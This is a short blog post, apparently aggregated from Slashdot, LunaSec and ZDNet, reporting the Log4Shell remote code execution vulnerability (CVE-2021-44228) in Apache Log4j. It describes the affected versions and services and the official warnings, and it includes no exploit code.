![]() Īn attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. Anybody using Apache Struts is likely vulnerable. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable. ![]() Many, many services are vulnerable to this exploit. ![]() This has been published as CVE-2021-44228 now. The 0-day was tweeted along with a POC posted on GitHub. We're calling it "Log4Shell" for short ( CVE-2021-44228 just isn't as memorable). Slashdot reader alfabravoteam shares an excerpt from a blog post by researchers a LunaSec, warning that "anybody using Apache Struts is likely vulnerable." From the report: Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. It's also used in enterprise applications and it's likely that many products will be found to be vulnerable as more is learned about the flaw. The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. CISA has urged users and administrators to apply the recommended mitigations "immediately" in order to address the critical vulnerabilities. CERT New Zealand warns that it's already being exploited in the wild. ![]() ZDNet reports: Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library. A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |